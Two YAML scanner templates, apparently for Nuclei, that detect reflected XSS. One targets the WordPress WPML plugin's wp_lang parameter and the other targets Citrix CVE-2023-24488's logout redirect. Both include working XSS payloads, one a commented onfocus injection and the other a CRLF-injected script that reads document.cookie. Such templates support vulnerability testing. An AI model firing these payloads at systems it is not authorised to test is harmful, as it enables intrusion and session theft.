├── wplang-xss.yaml
└── CVE-2023-24488.yaml


/wplang-xss.yaml:
--------------------------------------------------------------------------------
 1 | id: wplang-xss
 2 | 
 3 | #payload = wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(0)%0C
 4 | 
 5 | info:
 6 |   name: wp-xss
 7 |   author: 
 8 |   severity: high
 9 |   description: WordPress Plugin WPML Version < 4.6.1  RXSS vulnerability
10 |   reference:
11 |     - xss
12 |   remediation: update plugin to latest version
13 |   tags: xss
14 | 
15 | requests:
16 |   - method: GET
17 |     path:
18 |       - '{{BaseURL}}/wp-login.php?wp_lang=en_US%27'
19 | 
20 |     matchers-condition: and
21 |     matchers:
22 |       - type: status
23 |         status:
24 |           - 200
25 | 
26 |       - type: word
27 |         part: body
28 |         words:
29 |           - '#039;"='
30 | 
31 | 


--------------------------------------------------------------------------------
/CVE-2023-24488.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2023-24488
 2 | 
 3 | info:
 4 |   name: CVE-2023-24488
 5 |   author: assetnote
 6 |   severity: medium
 7 |   description: description
 8 |   reference:
 9 |     - https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/
10 |   tags: tags
11 | 
12 | requests:
13 |   - raw:
14 |       - |+
15 |         GET /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
16 |         Host: {{Hostname}}
17 |         Cookie: NSC_TASS=/Citrix
18 |         Cache-Control: max-age=0
19 |         Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Brave";v="114"
20 |         Sec-Ch-Ua-Mobile: ?0
21 |         Sec-Ch-Ua-Platform: "Windows"
22 |         Upgrade-Insecure-Requests: 1
23 |         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
24 |         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
25 |         Sec-Gpc: 1
26 |         Accept-Language: en-GB,en
27 |         Sec-Fetch-Site: none
28 |         Sec-Fetch-Mode: navigate
29 |         Sec-Fetch-User: ?1
30 |         Sec-Fetch-Dest: document
31 |         Accept-Encoding: gzip, deflate
32 |         Connection: close
33 | 
34 | 
35 |     matchers-condition: and
36 |     matchers:
37 |       - type: word
38 |         part: body
39 |         words:
40 |           - <script>alert(document.cookie)</script>
41 |       - type: status
42 |         status:
43 |           - 302
44 | 


--------------------------------------------------------------------------------